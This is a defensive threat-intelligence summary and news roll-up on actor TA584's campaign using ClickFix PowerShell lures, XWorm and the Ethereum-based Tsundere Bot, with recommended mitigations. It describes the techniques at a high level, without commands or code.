Full Report
TA584's current attack chain begins with emails sent from compromised accounts via SendGrid and Amazon SES.
Analysis Summary
# TA584 Initial Access Campaign via Tsundere Bot and XWorm
## Key Points
- TA584, a prolific initial access broker (IAB), has shifted its tactics to deploy a combination of the **Tsundere Bot** and **XWorm** remote access trojan (RAT).
- The campaign utilizes a sophisticated delivery mechanism involving compromised legitimate email services (**SendGrid** and **Amazon SES**) to bypass reputation-based filters.
- Attackers employ "ClickFix" social engineering, forcing users to solve a CAPTCHA and then execute a PowerShell command manually.
- The **Tsundere Bot** acts as a Malware-as-a-Service (MaaS) platform, leveraging the **Ethereum blockchain** to retrieve command-and-control (C2) addresses, making it highly resilient to domain takedowns.
- Increased targeting has been observed across Australia and several European nations, signaling a geographic expansion of the threat.
## Threat Actors
- **TA584**: A known initial access broker active since at least 2020.
- **Historical Context**: Previously associated with the delivery of Ursnif, Cobalt Strike, and other high-level payloads.
- **Motivation**: Financial (Initial Access Brokering), typically paving the way for downstream ransomware deployments.
## TTPs
- **Delivery**: Phishing emails sent from compromised accounts using Amazon SES and SendGrid.
- **Traffic Direction**: Use of unique URLs, geofencing, IP filtering, and the **Keitaro TDS** (Traffic Direction System) to filter targets.
- **Social Engineering**: "ClickFix" technique where victims are presented with a CAPTCHA followed by instructions to copy and run a malicious PowerShell command.
- **Persistence/Execution**: PowerShell commands load XWorm or Tsundere Bot directly into memory (fileless execution).
- **C2 Communication**: Tsundere Bot retrieves C2 configurations via Ethereum blockchain transactions.
## Affected Systems
- **Windows Operating Systems**: Specifically targets users capable of executing PowerShell commands.
- **Geographic Scope**: Significant impact in the **United States**, **Australia**, and various **European countries**.
- **Industry Scope**: Broad geographic targeting suggests an opportunistic approach toward corporate networks.
## Mitigations
- **User Education**: Train employees to recognize "ClickFix" scenarios where a website requests the manual execution of PowerShell or terminal commands.
- **PowerShell Restrictions**: Implement PowerShell Constrained Language Mode and disable execution for standard users where possible.
- **Email Filtering**: Monitor for unusual volumes of traffic from SendGrid or Amazon SES that utilize redirectors or TDS chains.
- **Endpoint Detection**: Use EDR solutions to monitor for suspicious PowerShell parent-child process relationships (e.g., Browser calling PowerShell).
- **Blockchain Monitoring**: Monitor for connections to known Ethereum gateway endpoints often used by malware for C2 retrieval.
## Conclusion
TA584 represents a significant risk as a bridge for ransomware groups. Their move toward "ClickFix" social engineering and blockchain-based C2 infrastructure demonstrates a high level of adaptability. Organizations should focus on hardening endpoint PowerShell configurations and educating users on the dangers of manual command execution prompted by web browsers.
***
# Morning News Roll-up January 29, 2026
## Overview
Today's intelligence focuses on the evolution of initial access brokers and the integration of sophisticated evasion techniques, including blockchain-based infrastructure and legitimate cloud service exploitation.
## Top Stories
### TA584 Shifts to Tsundere Bot and XWorm for Ransomware Access
- Summary: TA584 is leveraging compromised Amazon SES and SendGrid accounts to deliver a new attack chain. Using ClickFix social engineering and Ethereum-based C2 retrieval, the actor is deploying Tsundere Bot and XWorm to establish persistence in global networks.
- Source: hxxps://www[.]scworld[.]com/article/ta584-threat-actor-leverages-tsundere-bot-and-xworm-for-network-access
### Tsundere Bot Employs Ethereum Blockchain for C2 Resilience
- Summary: Detailed analysis of the Tsundere Bot reveals a "Malware-as-a-Service" model that uses the Ethereum blockchain to store and update its command-and-control addresses, effectively bypassing traditional DNS-based blocking.
- Source: hxxps://www[.]bleepingcomputer[.]com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/
### TA584 Expands Geographic Operations to Australia and Europe
- Summary: Long-term monitoring of TA584 shows a strategic expansion beyond traditional targets, with a surge in malicious traffic directed toward Australian and European infrastructure using sophisticated TDS filtering.
- Source: hxxps://www[.]scworld[.]com/topic/threat-intelligence